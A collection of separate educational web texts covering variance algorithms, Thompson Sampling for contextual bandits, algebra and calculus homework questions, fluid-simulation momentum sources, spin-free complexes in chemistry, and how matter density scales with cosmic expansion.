## II. Two-pass algorithm
An alternate approach, using a different formula for the variance, is given by the following pseudocode:
`n = 0`
`sum1 = 0`
`foreach x in data:`
` n = n + 1`
` sum1 = sum1 + x`
`end for`
`mean = sum1/n`
`sum2 = 0`
`foreach x in data:`
` sum2 = sum2 + (x - mean)^2`
`end for`
`variance = sum2/(n - 1)`
This algorithm is often more numerically reliable than the naïve algorithm I for large sets of data, although it can be worse if much of the data is very close to but not precisely equal to the mean and some are quite far away from it.
The results of both of these simple algorithms (I and II) can depend inordinately on the ordering of the data and can give poor results for very large data sets due to repeated roundoff error in the accumulation of the sums. Techniques such as compensated summation can be used to combat this error to a degree.
### IIa. Compensated variant
The compensated-summation version of the algorithm above reads:
`n = 0`
`sum1 = 0`
`foreach x in data:`
` n = n + 1`
` sum1 = sum1 + x`
`end for`
`mean = sum1/n`
`sum2 = 0`
`sumc = 0`
`foreach x in data:`
` sum2 = sum2 + (x - mean)^2`
` sumc = sumc + (x - mean)`
`end for`
`variance = (sum2 - sumc^2/n)/(n - 1)`
## III. On-line algorithm
It is often useful to be able to compute the variance in a single pass, inspecting each value $x_i$ only once; for example, when the data are being collected without enough storage to keep all the values, or when costs of memory access dominate those of computation. For such an online algorithm, a recurrence relation is required between quantities from which the required statistics can be calculated in a numerically stable fashion.
The following formulas can be used to update the mean and (estimated) variance of the sequence, for an additional element $x_\left\{mathrm\left\{new\right\}\right\}$. Here, m denotes the estimate of the population mean(using the sample mean), s2n-1 the estimate of the population variance, s2n the estimate of the sample variance, and n the number of elements in the sequence before the addition.
$m_\left\{mathrm\left\{new\right\}\right\} = frac\left\{n ; m_\left\{mathrm\left\{old\right\}\right\} + x_\left\{mathrm\left\{new\right\}\right\}\right\}\left\{n+1\right\} = m_\left\{mathrm\left\{old\right\}\right\} + frac\left\{x_\left\{mathrm\left\{new\right\}\right\} - m_\left\{mathrm\left\{old\right\}\right\}\right\}\left\{n+1\right\} !$
$s^2_\left\{mathrm\left\{n-1, new\right\}\right\} = frac\left\{\left(n-1\right) ; s^2_\left\{mathrm\left\{n-1, old\right\}\right\} + \left(x_\left\{mathrm\left\{new\right\}\right\} - m_\left\{mathrm\left\{new\right\}\right\}\right) , \left(x_\left\{mathrm\left\{new\right\}\right\} - m_\left\{mathrm\left\{old\right\}\right\}\right)\right\}\left\{n\right\} ; ; , , ; , mathrm\left\{n>0\right\} !$
$s^2_\left\{mathrm\left\{n, new\right\}\right\} = frac\left\{n ; s^2_\left\{mathrm\left\{n, old\right\}\right\} + \left(x_\left\{mathrm\left\{new\right\}\right\} - m_\left\{mathrm\left\{new\right\}\right\}\right) , \left(x_\left\{mathrm\left\{new\right\}\right\} - m_\left\{mathrm\left\{old\right\}\right\}\right)\right\}\left\{n+1\right\}.$
It turns out that a more suitable quantity for updating is the sum of squares of differences from the (current) mean, $sum_\left\{i=1\right\}^n \left(x_i - m\right)^2$, here denoted $M_2$:
$M_mathrm\left\{2,new\right\}! = M_mathrm\left\{2,old\right\} + \left(x_mathrm\left\{new\right\} - m_mathrm\left\{old\right\}\right)\left(x_mathrm\left\{new\right\} - m_mathrm\left\{new\right\}\right)$
$s^2_mathrm\left\{n\right\} = frac\left\{M_2\right\}\left\{n\right\}$
$s^2_mathrm\left\{n-1\right\} = frac\left\{M_2\right\}\left\{n-1\right\}$
A numerically stable algorithm is given below. It also computes the mean. This algorithm is due to Knuth, who cites Welford.
`n = 0`
`mean = 0`
`M2 = 0`
`foreach x in data:`
` n = n + 1`
` delta = x - mean`
` mean = mean + delta/n`
` M2 = M2 + delta*(x - mean) // This expression uses the new value of mean`
`end for`
`variance_n = M2/n`
`variance = M2/(n - 1)`
This algorithm is much less prone to loss of precision due to massive cancellation, but might not be as efficient because of the division operation inside the loop. For a particularly robust two-pass algorithm for computing the variance, first compute and subtract an estimate of the mean, and then use this algorithm on the residuals.
A slightly more convenient form allows one to calculate the standard deviation without having to explicitly calculate the new mean. If $n$ is the number of elements in the sequence after the addition of the new element, then one has
$s^2_\left\{mathrm\left\{n-1, new\right\}\right\} = frac\left\{\left(n-2\right)s^2_\left\{mathrm\left\{n-1, old\right\}\right\}+frac\left\{n-1\right\}\left\{n\right\}left\left(x_text\left\{new\right\}-m_text\left\{old\right\}right\right)^2\right\}\left\{n-1\right\}$
## IV. Weighted incremental algorithm
When the observations are weighted, West (1979) suggests this incremental algorithm:
`n = 0`
`foreach x in the data:`
` if n=0 then`
` n = 1`
` mean = x`
` S = 0`
` sumweight = weight`
` else`
` n = n + 1`
` temp = weight + sumweight`
` S = S + sumweight*weight*(x-mean)^2 / temp`
` mean = mean + (x-mean)*weight / temp`
` sumweight = temp`
` end if`
`end for`
`Variance = S * n / ((n-1) * sumweight) // if sample is the population, omit n/(n-1)`
## V. Parallel algorithm
Chan et al. note that the above on-line algorithm III is a special case of an algorithm that works for any partition of the sample $X$ into sets $X^A$, $X^B$:
$delta! = m^B - m^A$
$m^X = m^A + deltacdotfrac\left\{N^B\right\}\left\{N^X\right\}$
$M_2^X = M_2^A + M_2^B + delta^2cdotfrac\left\{N^A N^B\right\}\left\{N^X\right\}$.
This may be useful when, for example, multiple processing units may be assigned to discrete parts of the input.
### Higher-order statistics
Terriberry extends Chan's formulae to calculating the third and fourth central moments, needed for example when estimating skewness and kurtosis:
$M_3^X = M_3^A + M_3^B + delta^3frac\left\{N^A N^B \left(N^A - N^B\right)\right\}\left\{\left(N^X\right)^2\right\} + 3deltafrac\left\{N^AM_2^B - N^BM_2^A\right\}\left\{N^X\right\}$
begin\left\{align\right\}
M_4^X = M_4^A + M_4^B & + delta^4frac{N^A N^B left((N^A)^2 - N^A N^B + (N^B)^2right)}{(N^X)^3} & + 6delta^2frac{(N^A)^2 M_2^B + (N^B)^2 M_2^A}{(N^X)^2} + 4deltafrac{N^AM_3^B - N^BM_3^A}{N^X} end{align}
Here the $M_k$ are again the sums of powers of differences from the mean $Sigma\left(x - overline\left\{x\right\}\right)^k$, giving
skewness: $g_1 = frac\left\{sqrt\left\{n\right\} M_3\right\}\left\{M_2^\left\{3/2\right\}\right\},$
kurtosis: $g_2 = frac\left\{n M_4\right\}\left\{M_2^2\right\}.$
For the incremental case (i.e., $B = \left\{x\right\}$), this simplifies to:
$delta! = x - m$
$m\text{'} = m + frac\left\{delta\right\}\left\{n\right\}$
$M_2\text{'} = M_2 + delta^2 frac\left\{ n-1\right\}\left\{n\right\}$
$M_3\text{'} = M_3 + delta^3 frac\left\{ \left(n - 1\right) \left(n - 2\right)\right\}\left\{n^2\right\} - frac\left\{3delta M_2\right\}\left\{n\right\}$
$M_4\text{'} = M_4 + frac\left\{delta^4 \left(n - 1\right) \left(n^2 - 3n + 3\right)\right\}\left\{n^3\right\} + frac\left\{6delta^2 M_2\right\}\left\{n^2\right\} - frac\left\{4delta M_3\right\}\left\{n\right\}$
It should be noted that by preserving the value $delta / n$, only one division operation is needed and thus that the higher-order statistics can be calculated for little incremental cost.
## Example
Assume that all floating point operations use the standard IEEE 754 double-precision arithmetic. Consider the sample (4, 7, 13, 16) from an infinite population. Based on this sample, the estimated population mean is 10, and the unbiased estimate of population variance is 30. Both Algorithm I and Algorithm II compute these values correctly. Next consider the sample (108 + 4, 108 + 7, 108 + 13, 108 + 16), which gives rise to the same estimated variance as the first sample. Algorithm II computes this variance estimate correctly, but Algorithm I returns 29.333333333333332 instead of 30. While this loss of precision may be tolerable and viewed as a minor flaw of Algorithm I, it is easy to find data that reveal a major flaw in the naive algorithm: Take the sample to be (109 + 4, 109 + 7, 109 + 13, 109 + 16). Again the estimated population variance of 30 is computed correctly by Algorithm II, but the naive algorithm now computes it as −170.66666666666666. This is a serious problem with Algorithm I, since the variance can, by definition, never be negative.
|
|
# Thompson Sampling for Contextual bandits
Thompson Sampling is a very simple yet effective method to addressing the exploration-exploitation dilemma in reinforcement/online learning. In this series of posts, I’ll introduce some applications of Thompson Sampling in simple examples, trying to show some cool visuals along the way. All the code can be found on my GitHub page here.
In this post, we expand our Multi-Armed Bandit setting such that the expected rewards $\theta$ can depend on an external variable. This scenario is known as the Contextual bandit.
## The Contextual Bandit
The Contextual Bandit is just like the Multi-Armed bandit problem but now the true expected reward parameter $\theta_k$ depends on external variables. Therefore, we add the notion of context or state to support our decision.
Thus, we’re going to suppose that the probabilty of reward now is of the form
$\theta_k(x) = \frac{1}{1 + exp(-f(x))}$
where
$f(x) = \beta_0 + \beta_1 \cdot x + \epsilon$
and $\epsilon \sim \mathcal{N}(0, \sigma^2)$. In other words, the expected reward parameters for each bandit linearly depends of an external variable $x$ with logistic link. Let us implement this in Python:
# class to implement our contextual bandit setting
class ContextualMAB:
# initialization
def __init__(self):
# we build two bandits
self.weights = {}
self.weights[0] = [0.0, 1.6]
self.weights[1] = [0.0, 0.4]
# method for acting on the bandits
def draw(self, k, x):
# probability dict
prob_dict = {}
# loop for each bandit
for bandit in self.weights.keys():
# linear function of external variable
f_x = self.weights[bandit][0] + self.weights[bandit][1]*x
# generate reward with probability given by the logistic
probability = 1/(1 + np.exp(-f_x))
# appending to dict
prob_dict[bandit] = probability
# give reward according to probability
return np.random.choice([0,1], p=[1 - prob_dict[k], prob_dict[k]]), max(prob_dict.values()) - prob_dict[k], prob_dict[k]
Let us visualize how the contexual MAB setting will work. First, let us see how the bandit probabilities depend on $x$. We set $\beta_0 = 0$ for both bandits, and $\beta_1 = 1.6$ for Bandit 0 and $\beta_1 = 0.4$ for Bandit 1.
The plot shows us that an ideal strategy would select Bandit 0 if $x$ is greater than 0, and Bandit 1 if $x$ is less than 0. In the following plot, we show the bandits rewards over time depending on $x$ varying like a sine wave. The green and red shaded areas show the best action at each round.
We can see that more rewards pop up for Bandit 0 when $x$ is positive. Conversely, when $x$ is negative, Bandit 1 gives more rewards than Bandit 0. Let us implement an $\epsilon$-greedy policy and Thompson Sampling to solve this problem and compare their results.
## Algorithm 1: $\epsilon$-greedy with regular Logistic Regression
Let us implement a regular logistic regression, and use an $\epsilon$-greedy policy to choose which bandit to activate. We try to learn the expected reward function for each bandit:
$\theta_k(x) = \frac{1}{1 + exp(-f(x))}$
where
$f(x) = \beta_0 + \beta_1 \cdot x + \epsilon$
And select the bandit which maximizes $\theta(x)$, except when, with $\epsilon$ probability, we select a random action (excluding the greedy action, which in our case is to draw the other arm).
The code for this is not very complicated:
# Logistic Regression with e-greedy policy class
class EGreedyLR:
# initialization
def __init__(self, epsilon, n_bandits, buffer_size=200):
# storing epsilon, number of bandits, and buffer size
self.epsilon = epsilon
self.n_bandits = n_bandits
self.buffer_size = buffer_size
# function to fit and predict from a df
def fit_predict(self, data, actual_x):
# sgd object
logreg = LogisticRegression(fit_intercept=False)
# fitting to data
logreg.fit(data['x'].values.reshape(-1,1), data['reward'])
# returning probabilities
return logreg.predict_proba(actual_x)[0][1]
# decision function
def choose_bandit(self, round_df, actual_x):
# enforcing buffer size
round_df = round_df.tail(self.buffer_size)
# if we have enough data, calculate best bandit
if round_df.groupby(['k','reward']).size().shape[0] == 4:
# predictinng for two of our datasets
bandit_scores = round_df.groupby('k').apply(self.fit_predict, actual_x=actual_x)
# get best bandit
best_bandit = int(bandit_scores.idxmax())
# if we do not have, the best bandit will be random
else:
best_bandit = int(np.random.choice(list(range(self.n_bandits)),1)[0])
# choose greedy or random action based on epsilon
if np.random.random() > self.epsilon:
return best_bandit
else:
return int(np.random.choice(np.delete(list(range(self.n_bandits)), best_bandit),1)[0])
Let us see a run of this algorithm. The green and red shaded areas show us which bandit should be played by an optimal strategy.
As we may see on multiple runs, it may take long for the e-greedy algorithm to start selecting the arms at the right times. It’s very likely that it gets stuck on a suboptimal actions for a long time.
Thompson Sampling may offer more efficient exploration. But how can we use it?
## Algorithm 2: Online Logistic Regression by Chapelle et. al
In 2011, Chapelle & Li published the paper “An Empirical Evaluation of Thompson Sampling” that helped revive the interest on Thompson Sampling, showing favorable empirical results in comparison to other heuristics. We’re going to borrow the Online Logistic Regression algorithm (Algorithm 3) from the paper. Basically, it’s a bayesian logistic regression where we define a prior distribution for our weights $\beta_0$ and $\beta_1$, instead of just learning a point estimate for them (the expectation of the distribution).
So, our model, just like the greedy algorithm, is:
$\theta_k(x) = \frac{1}{1 + exp(-f(x))}$
where
$f(x) = \beta_0 + \beta_1 \cdot x + \epsilon$
but the weights are actually assumed to be distributed as independent gaussians:
$\beta_i = \mathcal{N}(m_i,q_i^{-1})$
We initialize all $q_i$’s with a hyperparamenter $\lambda$, which is equivalent to the $\lambda$ used in L2 regularization. Then, at each new training example (or batch of examples) we make the following calculations:
1. Find $\textbf{w}$ as the minimizer of $\frac{1}{2}\sum_{n=1}^{d} q_i(w_i - m_i)^2 + \sum_{j=1}^{n} \textrm{log}(1 + \textrm{exp}(1 + -y_jw^Tx_j))$
2. Update $m_i = w_i$ and perform $q_i = q_i + \sum_{j=1}^{n} x_{ij}p_j(1-p_j)$ where $p_j = 1 + \textrm{exp}(1 + -w^Tx_j)^{-1}$ (Laplace approximation)
There are some heavy maths, but in essence, we basically altered the logistic regression fitting process to accomodate distributions for the weights. Our Normal priors on the weights are iteratively updated and as the number of observations grow, our uncertainty over them is reduced.
We can also increase incentives for exploration or exploitation by defining a hyperparameter $\alpha$, which multiplies the variance of the Normal posteriors at prediction time:
$\beta_i = \mathcal{N}(m_i,\alpha \cdot{} q_i^{-1})$
With $0 < \alpha < 1$ we reduce the variance of the Normal priors, inducing the algorithm to be greedier, whereas with $\alpha > 1$ we prioritize exploration. Implementation of this algorithm by hand is a bit tricky. If you want to use a better code, with many possible improvements I would recommend skbayes. For now, let us use my craft OLR:
# defining a class for our online bayesian logistic regression
class OnlineLogisticRegression:
# initializing
def __init__(self, lambda_, alpha, n_dim):
# the only hyperparameter is the deviation on the prior (L2 regularizer)
self.lambda_ = lambda_; self.alpha = alpha
# initializing parameters of the model
self.n_dim = n_dim,
self.m = np.zeros(self.n_dim)
self.q = np.ones(self.n_dim) * self.lambda_
# initializing weights
self.w = np.random.normal(self.m, self.alpha * (self.q)**(-1.0), size = self.n_dim)
# the loss function
def loss(self, w, *args):
X, y = args
return 0.5 * (self.q * (w - self.m)).dot(w - self.m) + np.sum([np.log(1 + np.exp(-y[j] * w.dot(X[j]))) for j in range(y.shape[0])])
X, y = args
return self.q * (w - self.m) + (-1) * np.array([y[j] * X[j] / (1. + np.exp(y[j] * w.dot(X[j]))) for j in range(y.shape[0])]).sum(axis=0)
# method for sampling weights
def get_weights(self):
return np.random.normal(self.m, self.alpha * (self.q)**(-1.0), size = self.n_dim)
# fitting method
def fit(self, X, y):
# step 1, find w
self.w = minimize(self.loss, self.w, args=(X, y), jac=self.grad, method="L-BFGS-B", options={'maxiter': 20, 'disp':True}).x
self.m = self.w
# step 2, update q
P = (1 + np.exp(1 - X.dot(self.m))) ** (-1)
self.q = self.q + (P*(1-P)).dot(X ** 2)
# probability output method, using weights sample
def predict_proba(self, X, mode='sample'):
# sampling weights after update
self.w = self.get_weights()
# using weight depending on mode
if mode == 'sample':
w = self.w # weights are samples of posteriors
elif mode == 'expected':
w = self.m # weights are expected values of posteriors
else:
raise Exception('mode not recognized!')
# calculating probabilities
proba = 1 / (1 + np.exp(-1 * X.dot(w)))
return np.array([1-proba , proba]).T
The following plot shows the Online Logistic Regression estimate for a simple linear model. The plot at the left-hand side shows the Normal posterior of the coefficient after fitting the model to some data. At the right-hand side, we can observe how the uncertainty in our coefficient translates to uncertainty in the prediction.
This way, it is very simple to use Thompson Sampling: we perform an OLR for each bandit, take a sample of the posterior of $\beta$, get the sampled output and choose the bandit with the highest prediction! Let us check one simulation:
TS shows a learning curve, but rapidly converges to the right decisions. We can control the amount of exploration using $\alpha$, with the trade-off of possibly being stuck on a suboptiomal strategy or to incur heavy costs for better exploring the set of actions at our disposal. You can fork the code at my GitHub and run the simulation many times with the parameters of your choosing.
When I first learned this algorithm, one thing that made me very curious is how the posterior distributions of the weights change over time. Let us take a look!
## Visualizing the learning process
Let us visualize how the learning progresses and the model represents uncertainty. The following plot shows another episode using TS as the policy, along with the posterior distributions for $\beta_1$ for each bandit.
We see that in the first rounds our output probabilities have very large uncertainty and no clear direction. Also, our priors have large intersections, as the model is not very certain about its weights. As the rounds pass, we see that we effectively learn distributions for the weights and reduce our uncertainty around the output probabilities. When the model has low uncertainty, we start exploiting the bandits, choosing the best in each context.
## Regret analysis
Finally, as in the last post, let us analyze the regret of the two policies with a longer simulation. We now draw the context from an uniform distribution. As simulations are expensive, particularly for TS (due to the Online Logistic Regression), we run only one simulation. We also add buffers to the algorithms, so they can remember only the most recent draws. The regret plot for both policies follows:
## Conclusion
In this tutorial, we introduced the Contextual Bandit problem and presented two algorithms to solve it. The first, $\epsilon$-greedy, uses a regular logistic regression to get greedy estimates about the expeceted rewards $\theta(x)$. The second, Thompson Sampling, relies on the Online Logistic Regression to learn an independent normal distribution for each of the linear model weights $\beta_i \sim \mathcal{N}(m_i, q_i ^ -1)$. We draw samples from these Normal posteriors in order to achieve randomization for our bandit choices.
In this case, although Thompson Sampling presented better results, more experiments may be needed to declare a clear winner. The number of hyperparameters for both methods are the same: the regularization parameter $\lambda$ and the buffer size for both methods, $\epsilon$ for the $\epsilon$-greedy strategy and $\alpha$ for Thompson Sampling. Thompson Sampling may achieve the best results, but, in my experiments, it sometimes diverged depending on the hyperparameter configuration, completely inverting the correct bandit selection. The toy problem presented in this Notebook is very simple and may be not representative of the wild as well, so we may be better trusting the results on the Chapelle et. al paper. Last but not least, the time for fitting the Online Logistic Regression is an order of magnitude larger than fitting a regular logistic regression, which can still be improved if we use a technique like Stochastic Gradient Descent. In a big data context, it may be better to use a $\epsilon$-greedy stratedy for a while, then changing it to full exploitation at a some point given business knowledge. An $\epsilon$-decreasing strategy may be a good option as well.
|
|
165 Answered Questions for the topic Story Problem
11/09/15
#### What is the width of the spill?
A pilot of a small plane was flying over an oil spill at an altitude of 10,000 feet. He found that the near edge of the spill had an angle of depression of 58 degrees and the far edge of the spill... more
11/09/15
#### What would the dimensions of the hexagonal base be?
A farmer plans to build a regular hexagonal corn crib with sides 8 feet high. If he wants the crib to hold up to 1,000 bushels of corn, what would the dimensions of the hexagonal base be? (1,000... more
11/09/15
#### How tall is the antenna?
A broadcast antenna is located at the top of a building 1,000 feet tall. From a point on the same horizontal plane as the base of the building, the angles of elevation of the top and bottom of the... more
11/09/15
#### How much farther must she fly to get to Indianapolis?
A pilot intends to fly a distance of 175 miles from Chicago to Indianapolis. She begins 21 degrees off her course and proceeds 70 miles before discovering her error. After correcting her course,... more
11/09/15
#### Through what angle does the observer see the pole?
One end of a 9.3 foot pole is 13.6 feet from an observer's eyes, and the other end is 17.4 feet from the observer's eyes. Through what angle does the observer see the pole?
11/07/15
#### scott works as a tutor for $9 and hour and a waiter for$18 and hour he worked a combined total of 83 hours. t=tutor hours
I used to remember how to do this and now i am drawing a black please help.
10/26/15
#### The Brown's bus left at 9 A.M. And travelled for 150 miles at 57.8 mph. How fast must the bus travel the remaining distance to reach Cincy at 3:15 pm?
For the 280- mile trip from Cleveland to Cincinnati for the Monday night Battle-Of-Ohio Football Game between the Browns and the Bengals, the Browns bus left at 9 A.M. and traveled for 150 miles at... more
10/22/15
#### Need help with distance story problem
A train leaves little rock AK, and travels North at 55 kilograms an hour. Another train leaves at the same time and travels south at 90 kilograms and hour. How long will it take before they are 290... more
10/09/15
08/12/15
#### six times the sum of a number and 3 is 12 less than 12 times the number
this is all.thank you
08/09/15
#### If i played a game for a total of 388 hrs over 1 yrs time and am awake 16hrs/day how many hours a day was spent playing the game?
Looking for how many hrs per day were spent playing game?
06/27/15
#### A person drives 700 mile with fuel cost of 3 dollars per gallon and the vehicle gets 12 miles per gallon how much is total cost in dollars ?
A person drives 700 mile with fuel cost of 3 dollars per gallon and the vehicle gets 12 miles per gallon how much is total cost in dollars ?
06/17/15
#### Advanced Work Rate Word Problem
" A man can lay a concrete sidewalk in 5 days; his assistant can lay the same sidewalk in 8 days. After working together for 2 days, the man is called away. How long will it take the assistant to... more
## Still looking for help? Get the right answer, fast.
Get a free answer to a quick problem.
Most questions answered within 4 hours.
#### OR
Choose an expert and meet online. No packages or subscriptions, pay only for the time you need.
|
|
# Compute the following implicit derivative: $\displaystyle \frac{x}{1-x}-y^2+3x^3=5y$
It's not a particularly challenging derivative, but I would like to know whether or not my approach is correct.
I assumed, prior to the process of differentiation that $y$ is a continuous function of $x$, and hence I applied the chain rule in the instances where $y$ occurred, and also therefore differentiated every term with respect to $x$
So, let's begin:
Term $1$: $\displaystyle\frac{d}{dx}\left(\frac{x}{1-x}\right)=(1-x)^{-2}$
Term $2$: At this point, I did the following: I let $u$ be a continuous function of $x$ such that $u=y^2$, and hence I applied the chain rule, which states that $\displaystyle \frac{du}{dx}=\frac{du}{dy}\times\frac{dy}{dx}$, hence $\displaystyle \frac{d}{dx}(y^2)=2y\frac{dy}{dx}$
Term $3$: $\displaystyle \frac{d}{dx}(3x^3)=9x^2$
Term $4$: Again, the chain rule is applied to attain $\displaystyle \frac{d}{dx}(5y)=5\frac{dy}{dx}$
And from here I solved for $\displaystyle \frac{dy}{dx}$, which is:
$\displaystyle (1-x)^{-2}+9x^2=5\frac{dy}{dx}-2y\frac{dy}{dx}$
$\displaystyle\frac{dy}{dx}=\frac{9x^2}{(5-2y)(1-x)^2}$
So here are the questions; firstly, when differentiating implicit functions, will you always differentiate with respect to only one variable? Secondly, for the chain rule, is it a good idea to substitute, for example; $u=y^2$ or $n=5y$ and then calculate $\displaystyle \frac{du}{dx}$ or $\displaystyle \frac{dn}{dx}$, each time I come across a variable that is not $x$ (in this example)? And lastly, will this approach work for the differentiation of most, if not every, implicit function?
Any responses are appreciated.
• Are we sure that $\dfrac{d}{dx} \dfrac{x}{1-x}=(1-x)^{-2}$ I wasn't able to check with pen and paper but it looks to me like it is $0$ if we apply the quotient rule. – Deniz Tuna Yalçın Sep 1 '17 at 7:39
• Yes you were right OK – Deniz Tuna Yalçın Sep 1 '17 at 7:40
• For your second question about substituting I think it is safer to do it that way but I feel like it is easier to use $y'$ instead of the d notation and skip the intermeadiate steps like (say) $x^2+y^2=1 \rightarrow 2x+2yy'=0$ (easier than substituting although riskier. – Deniz Tuna Yalçın Sep 1 '17 at 7:43
• Makes sense, thanks for the advice! @DenizTunaYalçın – joshuaheckroodt Sep 1 '17 at 7:44
• You're welcome:)) – Deniz Tuna Yalçın Sep 1 '17 at 7:45
$$\frac{x}{1-x}-y^2+3x^3=5y \tag 1$$ $$\left(\frac{1}{1-x}+\frac{x}{(1-x)^2}\right)dx -2y\:dy+9x^2dx=5dy \tag 2$$ $\frac{1}{1-x}+\frac{x}{(1-x)^2} = \frac{1}{(1-x)^2}$ $$(2y+5)dy=\left(\frac{1}{(1-x)^2}+9x^2\right)dx$$ $$(2y+5)dy=\frac{1+9x^2(1-x)^2}{(1-x^2)}dx$$ $$y'=\frac{dy}{dx}=\frac{1+9x^2(1-x)^2}{(1-x^2)(2y+5)}$$
|
|
# Momentum Sources
Momentum sources can be used to simulate fans, ventilators and other similar devices without having to model the exact geometry and motion of the device. For instance, one may want to model an axial fan whose dimensions and output velocity are known. With this feature it is possible to assign the velocity output to a cylinder with the same cross section as the fan.
## Preparation
• Momentum sources can be used in every analysis type, except Compressible and Multiphase.
• Momentum source must be assigned to a volume, defined through a geometry primitive (cartesian box, sphere and cylinder) or a cell zone.
• It is recommended to refine the mesh in the vicinity of the source (e.g. refinement region downstream of the source), in order to better capture the dynamics of the flow.
## Creation of a momentum source
• In the simulation tree, navigate to Advanced Concepts and add a Momentum Source.
• Simscale currently supports only the Average velocity momentum source. This simulates a linear momentum defined by a velocity vector $$\vec{u} = [u_x u_y u_z]$$.
|
|
Question
# To multiply: The given expression. Then simplify if possible. Assume that all variables represent positive real numbers. Given: An expression: displaystylesqrt{{3}}{left(sqrt{{27}}-sqrt{{3}}right)}
To multiply:
The given expression. Then simplify if possible. Assume that all variables represent positive real numbers.
Given:
An expression: $$\displaystyle\sqrt{{3}}{\left(\sqrt{{27}}-\sqrt{{3}}\right)}$$
2020-11-24
Calculation:
To find the product of given expression, we will use distributive property
$$\displaystyle{a}{\left({b}+{c}\right)}={a}{b}+{a}{c}$$ as shown below:
$$\displaystyle\sqrt{{3}}{\left(\sqrt{{27}}-\sqrt{{3}}\right)}$$ (Given expression)
$$\displaystyle\Rightarrow\sqrt{{3}}\times\sqrt{{27}}-\sqrt{{3}}\times\sqrt{{3}}$$ (Using distributive property)
$$\displaystyle\Rightarrow\sqrt{{{3}\times{27}}}-\sqrt{{{3}\times{3}}}$$ (Applying rule root(n)a xx root(n)b = root(n)(ab))
$$\displaystyle\Rightarrow\sqrt{{81}}-\sqrt{{9}}$$
$$\displaystyle\Rightarrow\sqrt{{{9}^{2}}}-\sqrt{{{3}^{2}}}$$
$$\displaystyle\Rightarrow{9}-{3}\ \text{(Applying rule}\ \displaystyle{\sqrt[{{n}}]{{{a}^{n}}}}={a}$$)
$$\displaystyle\Rightarrow{6}$$
Therefore, the product of the given expressions would be 6.
|
|
Math Genius: Diagonal Elements of Inverse of Symmetric Matrix.
Original Source Link
Is there any shortcuts to calculate diagonal elements of the inverse of a symmetric matrix:
$$diag(X^Tcdot X)^{-1} = ?$$
Probably X is a sparse matrix.
($$X^{T}X$$ – symmetric matrix)
|
|
# Are high spin complexes and spin free complexes the same thing?
While solving some Coordination Compounds problems, I came across a problem that asked
Select which complex is high spin or spin free octahedral complex.
The term 'spin free' sounds like a complex with no unpaired electrons and I know high spin complexes are those which have unpaired electrons. But the question was was single correct and this got me confused.
Do the terms high spin and spin free bear the same meaning?
Spin Free Complex means that the electrons are free to spin! High spin complexes are the ones with Weak Field Ligands which aren't able to pair up electrons of the central ion.
Hence the 2 terms are usually used synonymously. On the same lines Low Spin Complexes and Spin Paired Complexes are used synonymously!
• Is this a regional dialect? I do find sources where "spin-free" is used in this way, but at least in US-English, "X-free" would mean something that lacks, or is free of, "X", see guilt-free, fat-free, worry-free. Oct 27 '21 at 15:16
• I am not really sure if it's taken from a dialect but that's what it's used for in chemistry. I 100% agree that is confusing, high spin complex is a much better word to use. Oct 27 '21 at 17:35
In a paper by the renowned chemist, F. Albert Cotton,
"Magnetic Investigations of Spin-free Cobaltous Complexes. III. On the Existence of Planar Complexes"
they investigate "spin-free" complexes which the authors defines as complexes with three unpaired electrons. Following this definition of spin-free complexes does not necessary imply high-spin, as in the case of some octahedral Cr(III) complexes, which have three unpaired electrons that can occupy the $$t_{2g}$$ energy level, making it low spin.
Side Note:
This definition of spin-free may be how Al. Cotton defined it for his paper; this is not a claim that it is representative of the entire group. Additionally, this paper is from the 1960s so contemporary definitions may differ.
|
|
OpenStudy (anonymous):
a pro baseball player has a 30% chance of getting a hit on any at-bat. he swings 12 times. whats the probability that he doesnt get a hit?
8 years ago
OpenStudy (anonymous):
If he has a 30% chance of getting a hit, then what is the probability that he does *not* get a hit? 70%. This problem is asking you the probability that that event takes place 12 times in a row. Repeated events like that require you to multiply the probability each time, so we get 0.70^12. Similarly, the odds of getting a hit all 12 times would be 0.30^12. Both are incredibly small numbers if you work them out, which reinforces the idea that the vast majority of the time you'll end up in the middle.
8 years ago
OpenStudy (anonymous):
thanks
8 years ago
|
|
$$\require{cancel}$$
# 13. The Evolution of Mass-Energy Density and a First Glance at the Contents of the Cosmos
We've seen that the rate of change of the scale factor depends on the mass density $$\rho$$. In order to determine how the scale factor evolves with time, we thus need to know how the density evolves as the scale factor changes. In this section we'll work that out for three cases. The first two are collections of particles: 1) non-relativistic particles, by which we mean those with rest-mass energy ($$mc^2$$) much greater than kinetic energy, and 2) relativistic particles, by which we mean particles with much greater kinetic energy than rest-mass energy. The former we call "matter" and the latter we call "radiation." The third one is much more exotic: a cosmological constant.
These are the three categories we need to describe the evolution of mass-energy density for all the significant components of the standard cosmological model. The relative contributions of these components to the total mass-energy density today, and over 13.7 billion years ago, are shown in the graphic to the right, as cosmologists have estimated them using data from NASA's Wilkinson Microwave Anisotropy Probe (WMAP) satellite. We'll call these components out as we consider Matter, Radiation, and the cosmological constant.
#### Matter
Let's begin by thinking about how the energy density of the gas in this room would evolve under expansion. Before we even get to that though, let's compare the kinetic energy of a typical Nitrogen molecule in the room to its rest-mass energy. The kinetic energy is roughly given by $$k_B T_{\rm room} \simeq 1/40$$eV where eV is a unity of energy called an electron Volt equal to the kinetic energy that an electron gains crossing a potential difference of 1 Volt. To get the rest mass, note that Nitrogen's most abundant isotope has 7 protons and 7 neutrons, and the molecule is two Nitrogen atoms so its mass is about 28 times the mass of the proton. The proton mass is almost $$1 \times 10^9$$eV/$$c^2$$, so the Nitrogen molecule rest mass energy is roughly $$mc^2 = 28 \times 10^9$$eV. You can see that its rest mass energy is much greater than its kinetic energy.
In thinking about the energy density of a gas of particles we need to keep track of the rest mass energy and the kinetic energy. However, for non-relativistic particles, those moving much more slowly than the speed of light, like the particles in the gas in this room, the kinetic energy is tiny compared to the total energy and we can ignore it. That makes our calculation very straightforward. Expansion will dilute the number of particles by the increase in volume.
Box $$\PageIndex{1}$$
Exercise 13.1.1: For a collection of particles all of the same mass, $$m$$, their energy density is given by:
\begin{equation*} \begin{aligned} \rho = m n c^2 \end{aligned} \end{equation*}
where $$n$$ is the number density of the particles. In your own words, argue that $$n \propto a^{-3}$$, and hence $$\rho \propto a^{-3}$$.
In the WMAP graphic, "Atoms" and "Dark Matter" are both forms of Matter. Atoms are just the usual matter we are familiar with from everyday life. They are the elements of the periodic table. We actually don't know what the dark matter is. But there are many different observations that can be most easily understood if we assume there is a significant amount of some unknown, not-yet-detected, type of non-relativistic particle that contributes more to the mass-energy of the universe than atoms do by a factor of 5.
